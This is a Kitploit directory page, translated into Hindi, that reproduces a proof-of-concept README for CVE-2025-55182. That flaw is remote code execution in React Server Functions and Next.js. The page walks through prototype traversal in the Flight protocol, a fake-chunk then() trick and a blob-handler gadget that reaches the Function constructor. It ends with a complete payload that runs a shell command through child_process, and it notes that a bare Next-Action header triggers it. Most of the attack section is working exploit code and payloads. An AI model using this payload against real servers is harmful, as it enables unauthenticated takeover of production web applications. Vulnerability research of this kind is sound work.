Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — CVE-2025-55182 के लिए PoC एक्सप्लॉइट, जो प्रोटोटाइप प्रदूषण और एक क्राफ्टेड Flight Protocol पेलोड के माध्यम से React Server Functions में रिमोट कोड एक्ज़ीक्यूशन का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/msanft/cve-2025-55182
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubmsanft/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 के लिए PoC एक्सप्लॉइट, जो प्रोटोटाइप प्रदूषण और एक क्राफ्टेड Flight Protocol पेलोड के माध्यम से React Server Functions में रिमोट कोड एक्ज़ीक्यूशन का प्रदर्शन करता है।

रिपॉजिटरी देखें
1.4k19859 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182

यह भेद्यता React सर्वर फ़ंक्शन्स (Server Functions) में RCE (रिमोट कोड एक्ज़ीक्यूशन) की अनुमति देती है, जैसे कि Next.js द्वारा असुरक्षित प्रोटोटाइप संदर्भों के माध्यम से प्रदान किए जाते हैं।

मैं React या Next.js का विशेषज्ञ नहीं हूँ, इसलिए यहाँ दी गई सभी जानकारी को संदेह की दृष्टि से लें।

पृष्ठभूमि

React सर्वर फ़ंक्शन्स1 प्रदान करता है, जिन्हें एक प्रकार का RPC-over-HTTP माना जा सकता है। इनका उपयोग निकटवर्ती पीयर्स से डेटा प्राप्त करने के लिए किया जा सकता है ताकि कम विलंबता सुनिश्चित हो, या प्रमाणित अनुरोध करने के लिए जिनके लिए क्लाइंट के पास क्रेडेंशियल्स नहीं होते।

React सर्वर फ़ंक्शन्स को भेजे गए मानों के क्रमांकन (serialization) के लिए React फ़्लाइट प्रोटोकॉल2 नामक चीज़ का उपयोग करता है।

क्लाइंट सर्वर को "chunks" भेजता है, उदाहरण के लिए फ़ॉर्म डेटा के माध्यम से:

root@kitploit:~
files = {
    "0": (None, '["$1"]'),
    "1": (None, '{"object":"fruit","name":"$2:fruitName"}'),
    "2": (None, '{"fruitName":"cherry"}'),
}

जैसा दिखाया गया है, इनमें एक-दूसरे के बीच संदर्भ हो सकते हैं। उपरोक्त पेलोड सर्वर पर निम्न प्रकार डी-सीरियलाइज़ होता है:

root@kitploit:~
{ object: 'fruit', name: 'cherry' }

यह प्रारूप स्वयं थोड़ा अधिक जटिल है और अधिक जटिल क्रमांकन एवं डी-क्रमांकन की अनुमति देता है, लेकिन यह वास्तविक भेद्यता के लिए एक बुनियादी समझ प्रदान करता है।

भेद्यता

इस कमिट3 तक, संदर्भ समाधान में chunks को ट्रैवर्स करते समय, जैसे उपरोक्त उदाहरण में chunk 2 से fruitName प्राप्त करना, React यह सत्यापित नहीं करता था कि अनुरोधित कुंजी वास्तव में ऑब्जेक्ट पर सेट है या नहीं। इससे हमें ऑब्जेक्ट का प्रोटोटाइप4 प्राप्त करने की अनुमति मिली।

इसे इस प्रकार के पेलोड के साथ प्रदर्शित किया जा सकता है:

root@kitploit:~
files = {
    "0": (None, '["$1:__proto__:constructor:constructor"]'),
    "1": (None, '{"x":1}'),
}

जो फ़ंक्शन कंस्ट्रक्टर5 में डी-सीरियलाइज़ होता है:

root@kitploit:~
[Function: Function]

जब ID 0 वाला chunk एक ऐरे नहीं बल्कि ऑब्जेक्ट होता है, तो हम then कुंजी को फ़ंक्शन कंस्ट्रक्टर पर सेट कर सकते हैं। उसके बाद ऑब्जेक्ट को decodeReplyFromBusboy फ़ंक्शन द्वारा वापस लौटाया जाता है और Next.js द्वारा awaited किया जाता है:

root@kitploit:~
// action-handler.ts:888 (pre-patch)
boundActionArguments = await decodeReplyFromBusboy(
    busboy,
    serverModuleMap,
    { temporaryReferences }
)

जब यह एक thenable लौटाता है, तो कॉलर में await इसे कॉल करेगा। इसी पेलोड के साथ ऐसा होता है:

root@kitploit:~
files = {
    "0": (None, '{"then":"$1:__proto__:constructor:constructor"}'),
    "1": (None, '{"x":1}'),
}

जिससे यह त्रुटि उत्पन्न होती है:

root@kitploit:~
SyntaxError: Unexpected token 'function'
    at Object.Function [as then] (<anonymous>) {
      digest: '1259793845'
    }

त्रुटि ऐसी दिखती है क्योंकि V8 एक await किए गए फ़ंक्शन को आंतरिक resolve और reject फ़ंक्शन्स के साथ कॉल करता है, जो toString किए जाने पर कुछ इस प्रकार क्रमांकित होते हैं:

root@kitploit:~
function () { [native code] }

शोषण

चूंकि हम आसानी से Function कंस्ट्रक्टर प्राप्त कर सकते हैं, सीधा रास्ता एक ऐसा कॉल गैजेट खोजना है जो कंस्ट्रक्टर को उपयोगकर्ता-नियंत्रित मान (अर्थात फ़ंक्शन का कोड एक स्ट्रिंग के रूप में) के साथ आमंत्रित करे, और बाद में लौटाए गए फ़ंक्शन को कॉल करे।

ऐसे कई स्थान हैं जो फ़ंक्शन कंस्ट्रक्टर को कॉल कर सकते हैं, उदाहरण के लिए resolveServerReference, जहाँ id एक नियंत्रित ऑब्जेक्ट है, और lastIndexOf को उपयोगकर्ता-नियंत्रित स्ट्रिंग लौटाने के लिए ओवरराइट किया जा सकता है (जैसे Array.prototype.join के माध्यम से) और slice को फ़ंक्शन कंस्ट्रक्टर पर ओवरराइट किया जा सकता है। हालाँकि, यह स्थान काम नहीं करता क्योंकि .slice() का दूसरा आह्वान पहले तर्क के रूप में एक संख्या प्रदान करता है, जिसे — मेरी सर्वोत्तम जानकारी के अनुसार — फ़ंक्शन कंस्ट्रक्टर कभी संभाल नहीं सकता।

यहाँ maple31426 का एक शानदार विचार काम आता है। जब getChunk संदर्भ श्रृंखला को हल करना शुरू करने के लिए ID 0 वाले chunk को रूट संदर्भ के रूप में लेता है, यही chunk एक निर्मित "नकली chunk" में हल हो सकता है।

हम $@ सिंटैक्स का उपयोग करके chunk 1 में निर्मित chunk 0 का संदर्भ दे सकते हैं, जो "कच्चा" chunk लौटाता है, न कि उसका हल किया गया मान:

root@kitploit:~
case "@":
  return (
    (obj = parseInt(value.slice(2), 16)), getChunk(response, obj)
  );

इसे उपरोक्त अपने then ओवरराइट के साथ मिलाकर, हम कुछ इस प्रकार निर्मित कर सकते हैं:

root@kitploit:~
files = {
    "0": (None, '{"then": "$1:__proto__:then"}'),
    "1": (None, '"$@0"'),
}

यहाँ, chunk 0 अपने स्वयं के कच्चे chunk प्रतिनिधित्व के .then() के साथ अपने .then() को ओवरराइट करता है। सीधे शब्दों में, हम अपने .then() को Chunk.prototype.then के साथ ओवरराइट करते हैं, जो मौजूद है, क्योंकि Chunks thenable हैं:

root@kitploit:~
Chunk.prototype.then = function (resolve, reject) {
      switch (this.status) {
        case "resolved_model":
          initializeModelChunk(this);
      }
      // ...

उपरोक्त पेलोड के साथ, Chunk.prototype.then अंततः ID 0 वाले निर्मित chunk के साथ कॉल किया जाता है।

जैसा ऊपर दिखाया गया है, जब हमारे नकली chunk पर .status resolved_model होता है:

root@kitploit:~
files = {
    "0": (None, '{"then": "$1:__proto__:then", "status": "resolved_model"}'),
    "1": (None, '"$@0"'),
}

हम initializeModelChunk में पहुँचते हैं। यहाँ, .value को JSON के रूप में पार्स किया जाता है, और फिर लौटाए गए ऑब्जेक्ट पर संदर्भों को हल किया जाता है, जिसमें ID 0 और 1 वाले हमारे chunks का "बाहरी" संदर्भ उपयोग होता है:

root@kitploit:~
function initializeModelChunk(chunk) {
    // ...
    var rawModel = JSON.parse(resolvedModel),
        value = reviveModel(chunk._response, { "": rawModel }, "", rawModel, rootReference);
    // ...

इसके भीतर, अब हमें मूल्यांकन का एक दूसरा दौर मिलता है, जिसमें हमारे पास कुछ अधिक मानों तक पहुँच होती है, क्योंकि बाहरी संदर्भ पहले ही हल हो चुका होता है।

फ़्लाइट प्रोटोकॉल में $B उपसर्ग के साथ ब्लॉब डेटा के प्रबंधन में एक कॉल गैजेट है:

root@kitploit:~
case "B":
  return (
    (obj = parseInt(value.slice(2), 16)),
    response._formData.get(response._prefix + obj)
  );

विशेष _response फ़ील्ड का उपयोग करके, हम निर्मित chunk के response गुण को नियंत्रित करते हैं:

root@kitploit:~
// in initializeModelChunk
value = reviveModel(chunk._response, // ...

इसके साथ, हम नकली ._formData और ._prefix गुणों वाला एक ऑब्जेक्ट निर्मित कर सकते हैं:

root@kitploit:~
crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"return foo; // ",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

initializeModelChunk में toString आह्वान पर विफल होने से बचने के लिए .reason को जोड़ना आवश्यक है:

root@kitploit:~
var rootReference = -1 === chunk.reason ? void 0 : chunk.reason.toString(16), resolvedModel = chunk.value;

._formData को फ़ंक्शन कंस्ट्रक्टर की ओर और ._prefix को अपने कोड की ओर इंगित करके, हमें ब्लॉब डी-क्रमांकन में फ़ंक्शन कंस्ट्रक्टर के लिए एक आह्वान गैजेट मिलता है:

root@kitploit:~
response._formData.get(response._prefix + "0")
// becomes
Function("return foo; // 0")

हमारा निर्मित फ़ंक्शन तब parseModelString द्वारा निर्मित chunk की .then() विधि के रूप में लौटाया जाता है, जिसे भी awaited किया जाता है, क्योंकि यह सब एक ही प्रॉमिस रिज़ॉल्विंग चेन में होता है। इस प्रकार, एक thenable लौटाने पर, हमारा निर्मित फ़ंक्शन कॉल हो जाता है। यह ऊपर संदर्भित आवश्यक कॉल गैजेट का निर्माण करता है।

इसे सब एक वास्तविक RCE पेलोड के साथ जोड़कर, हमें कुछ इस प्रकार मिलता है:

root@kitploit:~
crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"process.mainModule.require('child_process').execSync('calc');",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

files = {
    "0": (None, json.dumps(crafted_chunk)),
    "1": (None, '"$@0"'),
}

अतिरिक्त लाभ, जो इस भेद्यता को और भी गंभीर बनाता है, यह है कि यह सब डी-क्रमांकन के दौरान होता है, इससे पहले कि अनुरोधित एक्शन को getActionModIdOrError में पहली बार मान्य किया जाए। इस प्रकार, Next-Action: foo जैसा हेडर सेट करना भेद्यता को ट्रिगर करने के लिए पर्याप्त है।

Footnotes

  1. https://raw.githubusercontent.com/msanft/cve-2025-55182/main/%3Chttps:/react.dev/reference/rsc/server-functions%3E ↩

  2. https://raw.githubusercontent.com/msanft/cve-2025-55182/main/%3Chttps:/tonyalicea.dev/blog/understanding-react-server-components/%3E ↩

  3. https://raw.githubusercontent.com/msanft/cve-2025-55182/main/%3Chttps:/github.com/facebook/react/pull/35277/commits/e2fd5dc6ad973dd3f220056404d0ae0a8707998d%3E ↩

  4. https://raw.githubusercontent.com/msanft/cve-2025-55182/main/%3Chttps:/developer.mozilla.org/en-US/docs/Learn_web_development/Extensions/Advanced_JavaScript_objects/Object_prototypes%3E ↩

  5. https://raw.githubusercontent.com/msanft/cve-2025-55182/main/%3Chttps:/developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function/Function%3E ↩

  6. https://raw.githubusercontent.com/msanft/cve-2025-55182/main/%3Chttps:/x.com/maple3142%3E ↩

टूल डाउनलोड करें